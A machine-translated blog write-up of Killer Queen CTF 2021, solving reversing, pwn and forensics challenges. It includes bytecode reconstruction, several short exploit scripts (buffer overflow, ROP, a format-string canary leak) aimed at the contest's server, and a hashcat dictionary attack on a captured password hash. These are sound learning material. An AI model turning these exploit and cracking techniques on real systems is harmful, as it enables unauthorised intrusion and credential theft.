{"componentChunkName":"component---src-templates-post-template-js","path":"/ctf-killer-queen-2021-en","result":{"data":{"markdownRemark":{"id":"2777c6e6-6b9c-53e7-8248-7506b704a4e0","html":"
\n

This page has been machine-translated from the original page.

\n
\n

I participated in Killer Queen CTF 2021 as team 0neP@dding, and I wrote a short writeup only for the challenges I found interesting.

\n

The scoreboard was closed as soon as the event ended, so unfortunately I do not know the final standings. We solved 14 challenges in total, and the last time I checked the scoreboard we were in 62nd place. (The final standing was probably around 100th.)

\n

Given that nearly 1,000 teams participated, that is not bad, but personally I wanted to place in the top 50, so I need to keep improving.

\n\n

Table of Contents

\n\n

Rev

\n

sneeki_snek

\n

This was a reversing challenge involving Python bytecode generated as an intermediate .pyc file.

\n

Once you inspect the bytecode, you can roughly tell what it does. From there, you can reconstruct the Python script, compile it in your own environment, and confirm that the generated bytecode matches the challenge bytecode to recover the flag.

\n
  4           0 LOAD_CONST               1 ('')\n              2 STORE_FAST               0 (f)\n\n  5           4 LOAD_CONST               2 ('rwhxi}eomr\\\\^`Y')\n              6 STORE_FAST               1 (a)\n\n  6           8 LOAD_CONST               3 ('f]XdThbQd^TYL&\\x13g')\n             10 STORE_FAST               2 (z)\n\n  7          12 LOAD_FAST                1 (a)\n             14 LOAD_FAST                2 (z)\n             16 BINARY_ADD\n             18 STORE_FAST               1 (a)\n\n  8          20 LOAD_GLOBAL              0 (enumerate)\n             22 LOAD_FAST                1 (a)\n             24 CALL_FUNCTION            1\n             26 GET_ITER\n        >>   28 FOR_ITER                48 (to 78)\n             30 UNPACK_SEQUENCE          2\n             32 STORE_FAST               3 (i)\n             34 STORE_FAST               4 (b)\n\n  9          36 LOAD_GLOBAL              1 (ord)\n             38 LOAD_FAST                4 (b)\n             40 CALL_FUNCTION            1\n             42 STORE_FAST               5 (c)\n\n 10          44 LOAD_FAST                5 (c)\n             46 LOAD_CONST               4 (7)\n             48 BINARY_SUBTRACT\n             50 STORE_FAST               5 (c)\n\n 11          52 LOAD_FAST                5 (c)\n             54 LOAD_FAST                3 (i)\n             56 BINARY_ADD\n             58 STORE_FAST               5 (c)\n\n 12          60 LOAD_GLOBAL              2 (chr)\n             62 LOAD_FAST                5 (c)\n             64 CALL_FUNCTION            1\n             66 STORE_FAST               5 (c)\n\n 13          68 LOAD_FAST                0 (f)\n             70 LOAD_FAST                5 (c)\n             72 INPLACE_ADD\n             74 STORE_FAST               0 (f)\n             76 JUMP_ABSOLUTE           28\n\n 14     >>   78 LOAD_GLOBAL              3 (print)\n             80 LOAD_FAST                0 (f)\n             82 CALL_FUNCTION            1\n             84 POP_TOP\n             86 LOAD_CONST               0 (None)\n             88 RETURN_VALUE
\n

I used the following article as a reference for generating and inspecting bytecode.

\n

Reference: Reading pyc file (Python 3.5.2) - Qiita

\n

Here is the reconstructed Python script in the end.

\n
f = ''\na = 'rwhxi}eomr\\\\^`Y'\nz = 'f]XdThbQd^TYL&\\x13g'\na = a + z\nfor i, b in enumerate(a):\n    c = ord(b)\n    c = c - 7\n    c = c + i\n    c = chr(c)\n    f += c\n\nprint(f)
\n

Running this gives the flag.

\n

sneeki_snek2

\n

The bytecode is a bit longer, but it can be solved with the same approach as the previous challenge.

\n
  4           0 BUILD_LIST               0\n              2 STORE_FAST               0 (a)\n\n  5           4 LOAD_FAST                0 (a)\n              6 LOAD_METHOD              0 (append)\n              8 LOAD_CONST               1 (1739411)\n             10 CALL_METHOD              1\n             12 POP_TOP\n\n  6          14 LOAD_FAST                0 (a)\n             16 LOAD_METHOD              0 (append)\n             18 LOAD_CONST               2 (1762811)\n             20 CALL_METHOD              1\n             22 POP_TOP\n\n  7          24 LOAD_FAST                0 (a)\n             26 LOAD_METHOD              0 (append)\n             28 LOAD_CONST               3 (1794011)\n             30 CALL_METHOD              1\n             32 POP_TOP\n\n  8          34 LOAD_FAST                0 (a)\n             36 LOAD_METHOD              0 (append)\n             38 LOAD_CONST               4 (1039911)\n             40 CALL_METHOD              1\n             42 POP_TOP\n\n  9          44 LOAD_FAST                0 (a)\n             46 LOAD_METHOD              0 (append)\n             48 LOAD_CONST               5 (1061211)\n             50 CALL_METHOD              1\n             52 POP_TOP\n\n 10          54 LOAD_FAST                0 (a)\n             56 LOAD_METHOD              0 (append)\n             58 LOAD_CONST               6 (1718321)\n             60 CALL_METHOD              1\n             62 POP_TOP\n\n 11          64 LOAD_FAST                0 (a)\n             66 LOAD_METHOD              0 (append)\n             68 LOAD_CONST               7 (1773911)\n             70 CALL_METHOD              1\n             72 POP_TOP\n\n 12          74 LOAD_FAST                0 (a)\n             76 LOAD_METHOD              0 (append)\n             78 LOAD_CONST               8 (1006611)\n             80 CALL_METHOD              1\n             82 POP_TOP\n\n 13          84 LOAD_FAST                0 (a)\n             86 LOAD_METHOD              0 (append)\n             88 LOAD_CONST               9 (1516111)\n             90 CALL_METHOD              1\n             92 POP_TOP\n\n 14          94 LOAD_FAST                0 (a)\n             96 LOAD_METHOD              0 (append)\n             98 LOAD_CONST               1 (1739411)\n            100 CALL_METHOD              1\n            102 POP_TOP\n\n 15         104 LOAD_FAST                0 (a)\n            106 LOAD_METHOD              0 (append)\n            108 LOAD_CONST              10 (1582801)\n            110 CALL_METHOD              1\n            112 POP_TOP\n\n 16         114 LOAD_FAST                0 (a)\n            116 LOAD_METHOD              0 (append)\n            118 LOAD_CONST              11 (1506121)\n            120 CALL_METHOD              1\n            122 POP_TOP\n\n 17         124 LOAD_FAST                0 (a)\n            126 LOAD_METHOD              0 (append)\n            128 LOAD_CONST              12 (1783901)\n            130 CALL_METHOD              1\n            132 POP_TOP\n\n 18         134 LOAD_FAST                0 (a)\n            136 LOAD_METHOD              0 (append)\n            138 LOAD_CONST              12 (1783901)\n            140 CALL_METHOD              1\n            142 POP_TOP\n\n 19         144 LOAD_FAST                0 (a)\n            146 LOAD_METHOD              0 (append)\n            148 LOAD_CONST               7 (1773911)\n            150 CALL_METHOD              1\n            152 POP_TOP\n\n 20         154 LOAD_FAST                0 (a)\n            156 LOAD_METHOD              0 (append)\n            158 LOAD_CONST              10 (1582801)\n            160 CALL_METHOD              1\n            162 POP_TOP\n\n 21         164 LOAD_FAST                0 (a)\n            166 LOAD_METHOD              0 (append)\n            168 LOAD_CONST               8 (1006611)\n            170 CALL_METHOD              1\n            172 POP_TOP\n\n 22         174 LOAD_FAST                0 (a)\n            176 LOAD_METHOD              0 (append)\n            178 LOAD_CONST              13 (1561711)\n            180 CALL_METHOD              1\n            182 POP_TOP\n\n 23         184 LOAD_FAST                0 (a)\n            186 LOAD_METHOD              0 (append)\n            188 LOAD_CONST               4 (1039911)\n            190 CALL_METHOD              1\n            192 POP_TOP\n\n 24         194 LOAD_FAST                0 (a)\n            196 LOAD_METHOD              0 (append)\n            198 LOAD_CONST              10 (1582801)\n            200 CALL_METHOD              1\n            202 POP_TOP\n\n 25         204 LOAD_FAST                0 (a)\n            206 LOAD_METHOD              0 (append)\n            208 LOAD_CONST               7 (1773911)\n            210 CALL_METHOD              1\n            212 POP_TOP\n\n 26         214 LOAD_FAST                0 (a)\n            216 LOAD_METHOD              0 (append)\n            218 LOAD_CONST              13 (1561711)\n            220 CALL_METHOD              1\n            222 POP_TOP\n\n 27         224 LOAD_FAST                0 (a)\n            226 LOAD_METHOD              0 (append)\n            228 LOAD_CONST              10 (1582801)\n            230 CALL_METHOD              1\n            232 POP_TOP\n\n 28         234 LOAD_FAST                0 (a)\n            236 LOAD_METHOD              0 (append)\n            238 LOAD_CONST               7 (1773911)\n            240 CALL_METHOD              1\n            242 POP_TOP\n\n 29         244 LOAD_FAST                0 (a)\n            246 LOAD_METHOD              0 (append)\n            248 LOAD_CONST               8 (1006611)\n            250 CALL_METHOD              1\n            252 POP_TOP\n\n 30         254 LOAD_FAST                0 (a)\n            256 LOAD_METHOD              0 (append)\n            258 LOAD_CONST               9 (1516111)\n            260 CALL_METHOD              1\n            262 POP_TOP\n\n 31         264 LOAD_FAST                0 (a)\n            266 LOAD_METHOD              0 (append)\n            268 LOAD_CONST               9 (1516111)\n            270 CALL_METHOD              1\n            272 POP_TOP\n\n 32         274 LOAD_FAST                0 (a)\n            276 LOAD_METHOD              0 (append)\n            278 LOAD_CONST               1 (1739411)\n            280 CALL_METHOD              1\n            282 POP_TOP\n\n 33         284 LOAD_FAST                0 (a)\n            286 LOAD_METHOD              0 (append)\n            288 LOAD_CONST              14 (1728311)\n            290 CALL_METHOD              1\n            292 POP_TOP\n\n 34         294 LOAD_FAST                0 (a)\n            296 LOAD_METHOD              0 (append)\n            298 LOAD_CONST              15 (1539421)\n            300 CALL_METHOD              1\n            302 POP_TOP\n\n 36         304 LOAD_CONST              16 ('')\n            306 STORE_FAST               1 (b)\n\n 37         308 LOAD_FAST                0 (a)\n            310 GET_ITER\n        >>  312 FOR_ITER                80 (to 394)\n            314 STORE_FAST               2 (i)\n\n 38         316 LOAD_GLOBAL              1 (str)\n            318 LOAD_FAST                2 (i)\n            320 CALL_FUNCTION            1\n            322 LOAD_CONST               0 (None)\n            324 LOAD_CONST               0 (None)\n            326 LOAD_CONST              17 (-1)\n            328 BUILD_SLICE              3\n            330 BINARY_SUBSCR\n            332 STORE_FAST               3 (c)\n\n 39         334 LOAD_FAST                3 (c)\n            336 LOAD_CONST               0 (None)\n            338 LOAD_CONST              17 (-1)\n            340 BUILD_SLICE              2\n            342 BINARY_SUBSCR\n            344 STORE_FAST               3 (c)\n\n 40         346 LOAD_GLOBAL              2 (int)\n            348 LOAD_FAST                3 (c)\n            350 CALL_FUNCTION            1\n            352 STORE_FAST               3 (c)\n\n 41         354 LOAD_FAST                3 (c)\n            356 LOAD_CONST              18 (5)\n            358 BINARY_XOR\n            360 STORE_FAST               3 (c)\n\n 42         362 LOAD_FAST                3 (c)\n            364 LOAD_CONST              19 (55555)\n            366 BINARY_SUBTRACT\n            368 STORE_FAST               3 (c)\n\n 43         370 LOAD_FAST                3 (c)\n            372 LOAD_CONST              20 (555)\n            374 BINARY_FLOOR_DIVIDE\n            376 STORE_FAST               3 (c)\n\n 44         378 LOAD_FAST                1 (b)\n            380 LOAD_GLOBAL              3 (chr)\n            382 LOAD_FAST                3 (c)\n            384 CALL_FUNCTION            1\n            386 INPLACE_ADD\n            388 STORE_FAST               1 (b)\n            390 EXTENDED_ARG             1\n            392 JUMP_ABSOLUTE          312\n\n 45     >>  394 LOAD_GLOBAL              4 (print)\n            396 LOAD_FAST                1 (b)\n            398 CALL_FUNCTION            1\n            400 POP_TOP\n            402 LOAD_CONST               0 (None)\n            404 RETURN_VALUE
\n

Here is the reconstructed Python script.

\n
a = []\na.append(1739411)\na.append(1762811)\na.append(1794011)\na.append(1039911)\na.append(1061211)\na.append(1718321)\na.append(1773911)\na.append(1006611)\na.append(1516111)\na.append(1739411)\na.append(1582801)\na.append(1506121)\na.append(1783901)\na.append(1783901)\na.append(1773911)\na.append(1582801)\na.append(1006611)\na.append(1561711)\na.append(1039911)\na.append(1582801)\na.append(1773911)\na.append(1561711)\na.append(1582801)\na.append(1773911)\na.append(1006611)\na.append(1516111)\na.append(1516111)\na.append(1739411)\na.append(1728311)\na.append(1539421)\nb = ''\nfor i in a:\n    c = str(i)[::-1]\n    c = c[:-1]\n    c = int(c)\n    c = c ^ 5\n    c = c - 55555\n    c = c // 555\n    b += chr(c)\n\nprint(b)
\n

Running this yields the flag.

\n

jazz

\n

You are given a JAR file and an encrypted text, so first extract the JAR.

\n
jar -xvf challenge.jar
\n

That gave me the following Java source code.

\n
import java.util.*;\nimport java.io.*;\npublic class challenge {\n   public static void main(String[] args) throws FileNotFoundException {\n      Scanner s = new Scanner(new BufferedReader(new FileReader(\"flag.txt\")));\n      String flag = s.nextLine();\n      \n      char[] r2 = flag.toCharArray();\n      String build = \"\";\n      for(int a = 0; a < r2.length; a++)\n      {\n         build += (char)(158 - r2[a]);\n      }\n      r2 = build.toCharArray();\n      build = \"\";\n      for(int a = 0; 2*a < r2.length - 1; a++)\n      {\n         build += (char)((2*r2[2*a]-r2[2*a+1]+153)%93+33);\n         build += (char)((r2[2*a+1]-r2[2*a]+93)%93+33);\n      }\n      System.out.println(build);\n   }\n}
\n

The flag is first encrypted with (char)(158 - r2[a]), and then encrypted again in pairs of two characters.

\n
build += (char)((2*r2[2*a]-r2[2*a+1]+153)%93+33);\nbuild += (char)((r2[2*a+1]-r2[2*a]+93)%93+33);
\n

I wrote a script to reverse this process and recover the flag.

\n

I identified the part encrypted in two-character pairs by brute-forcing the 128-byte range.

\n
enc = \"\"\"9xLmMiI2znmPam'D_A_1:RQ;Il\\*7:%i\".R<\"\"\"\n\nbase = \"\"\nfor i in range(0, len(enc), 2):\n    l = enc[i]\n    r = enc[i+1]\n    for a in range(128):\n        for b in range(128):\n            v1 = 158 - a\n            v2 = 158 - b\n            if (chr((2*v1-v2+153)%93+33) == l) and (chr((v2-v1+93)%93+33) == r):\n                if a > 33 and b > 33:\n                    base += chr(a) + chr(b)\nprint(base)
\n

The challenge itself was easy, but the originally provided ciphertext was corrupted, and even the corrected version still had issues, so it required some guesswork and ended up being oddly exhausting.

\n

Unfortunately, it only gets one star from me.

\n

gombalab

\n

This was arguably the hardest challenge for me this time. I could not solve it before the end, so I am writing this while looking at the intended solution.

\n

The challenge binary appears to be an ELF file built in Go.

\n

After locating the main function, I found that you reach the flag by clearing each phase in order.

\n

\n \n \n \n \n \n \n \n \n

\n

My reversing skills are not great, so honestly I could not tell much just by looking at this, haha.

\n

However, when I did some dynamic analysis with GDB, I found that this branch is reached no matter what random input you give it.

\n

I also found that local_108 appears to store the input length plus the newline.

\n
  if (local_108 == 0x2a) {\n    runtime.memequal();\n  }
\n

\n \n \n \n \n \n \n \n \n

\n

So main_phase1 seems to take a 41-character input and compare it against the string at 0x4d7f94.

\n

So I entered For whom the bell tolls. Time marches on. and cleared the first hurdle.

\n

Next, I looked at main_phase2.

\n

\n \n \n \n \n \n \n \n \n

\n

Pwn

\n

A Kind of Magic

\n

This was a basic buffer overflow challenge.

\n
from ptrlib import *\nelf = ELF(\"./pwn01\")\nnopsled = b\"\\x41\"*44\nshellcode = b\"\\x39\\x05\\x00\\x00\"\npayload = nopsled + shellcode\n\nsock = Socket(\"143.198.184.186\", 5000)\nsock.sendline(payload)\nsock.interactive()
\n

I wasted time because I hard-coded the little-endian byte sequence incorrectly, so lesson learned.

\n

HammerToFall

\n

This one was pretty interesting.

\n

The goal was to find an input that makes the following Python script print flag!.

\n
import numpy as np\n\na = np.array([0], dtype=int)\nval = int(input(\"This hammer hits so hard it creates negative matter\\n\"))\nif val == -1:\n\texit()\na[0] = val\na[0] = (a[0] * 7) + 1\nprint(a[0])\nif a[0] == -1:\n\tprint(\"flag!\")
\n

NumPy integers are limited to the range of signed 64-bit integers, and overflowed values are interpreted as the corresponding negative numbers. (If you are curious, look up two’s complement.)

\n

So the correct input is 2635249153387078802, because multiplying it by 7 and adding 1 causes an overflow that is interpreted as exactly -1.

\n

zoom2win

\n

This was a simple ROP challenge, but the binary was 64-bit, and I got caught by the stack-alignment trap: the exploit worked locally but would not land remotely.

\n

I used the following article as a reference and recovered the flag by skipping push rbp so the return-address byte count stayed aligned.

\n

Reference: [Repost] Stack Alignment in Pwn - Qiita

\n
from pwn import *\n\nelf = ELF(\"/home/parrot/Downloads/zoom2win\")\ncontext.binary = elf\n\np = remote(\"143.198.184.186\", 5003)\nnopsled = b\"\\x41\"*40\nshellcode = p64(0x40119b)\npayload = nopsled + shellcode\np.sendline(payload)\np.interactive()
\n

This solver got the flag.

\n

tweetbird

\n

This challenge was about bypassing a stack canary and landing a ROP chain.

\n

I managed to use a format-string attack to leak the canary bytes from memory, but for some reason the exploit still did not land, so I gave up.

\n

Later I realized the problem: I was converting the leaked bytes from memory into little-endian before putting them into the payload, but since they were already leaked from memory, they were already in little-endian format… orz

\n

So once I embedded the leaked canary bytes directly into the payload, the ROP chain worked and I got the flag.

\n
from pwn import *\nelf = ELF(\"/home/parrot/Downloads/tweetybirb\")\ncontext.binary = elf\nnopsled = b\"\\x41\"*72\npayload = nopsled\n\np = process(\"/home/parrot/Downloads/tweetybirb\")\n# p = remote(\"143.198.184.186\", 5002)\n# shellcode = p64(0xc6a8b9f731892800)\n# p.sendline(payload)\n# p.sendline(b\"A\"*72 + b\"%08x.\"*20)\nr = p.recvline()\np.sendline(\"%15$p\")\nr = p.recvline()\nshellcode = p64(int(r.strip(), 0x10))\nshellcode2 = p64(0x4011db)\np.sendline(payload + shellcode + b'\\x41'*8 + shellcode2)\np.interactive()
\n

This works.

\n

Forensic

\n

Obligatory Shark

\n

The provided pcap turned out to contain Telnet traffic.

\n

Since Telnet is plaintext, I could recover the password.

\n

The password looked like an MD5 hash, so I ran a dictionary attack with Hashcat, recovered the original password, and got the flag.

\n
hashcat -a 0 -m 0 list.hash /usr/share/wordlists/rockyou.txt
\n

Shes A Killed Queen

\n

The file provided was a corrupted PNG.

\n

After inspecting it, I found that the IHDR chunk size had been set to 0 x 0, so repairing that seemed to be the right approach.

\n

If you just write in arbitrary values, the CRC check fails, so I used png-parser to obtain the correct CRC and then brute-force the dimensions.

\n
from binascii import crc32\n\ncorrect_crc = int('0db3f6c0',16)\n\nfor h in range(2000):\n    for w in range(2000):\n        data = (\n            b\"\\x49\\x48\\x44\\x52\"\n            + w.to_bytes(4, byteorder=\"big\")\n            + h.to_bytes(4, byteorder=\"big\")\n            + b\"\\x08\\x06\\x00\\x00\\x00\"\n        )\n        if crc32(data) & 0xffffffff == correct_crc:\n            print(\"Width: \", end=\"\")\n            print(hex(w))\n            print(\"Height :\", end=\"\")\n            print(hex(h))\n            exit()
\n

That gave me the correct IHDR chunk size, so I patched the file in a binary editor and restored the image.

\n

After running steganography on the restored image, I got the following ciphertext, but I could not solve it and had to give up.

\n

\n \n \n \n \n \n \n \n \n

\n

Apparently it was a known cipher called Mary Stuart Code, and it could be decoded with Mary Queen of Scots Cipher/Code - Online Decoder, Translator.

\n

I even tried image searches and similar ideas, but I still fell just short of the flag.

\n

Summary

\n

Killer Queen CTF 2021 had nearly 1,000 participating teams and even sponsors, but there were many infrastructure issues with the challenge servers and quite a few problems with the challenges themselves, so it was a pretty rough event.

\n

The scoreboard was constantly buggy, and at one point you had to DM the organizers just to log in, which made it a rather rare experience for a CTF of this size.

","fields":{"slug":"/ctf-killer-queen-2021-en","tagSlugs":["/tag/ctf-en/","/tag/reversing-en/","/tag/pwn-en/","/tag/forensic-en/","/tag/english/"]},"frontmatter":{"date":"2021-11-01","description":"Writeups for interesting and educational challenges from Killer Queen CTF 2021.","tags":["CTF (en)","Reversing (en)","Pwn (en)","Forensic (en)","English"],"title":"Killer Queen CTF 2021 WriteUp","socialImage":{"publicURL":"/static/dc4d8b7f8795f3c3d3489d9957d155f2/no-image.png"}}}},"pageContext":{"slug":"/ctf-killer-queen-2021-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}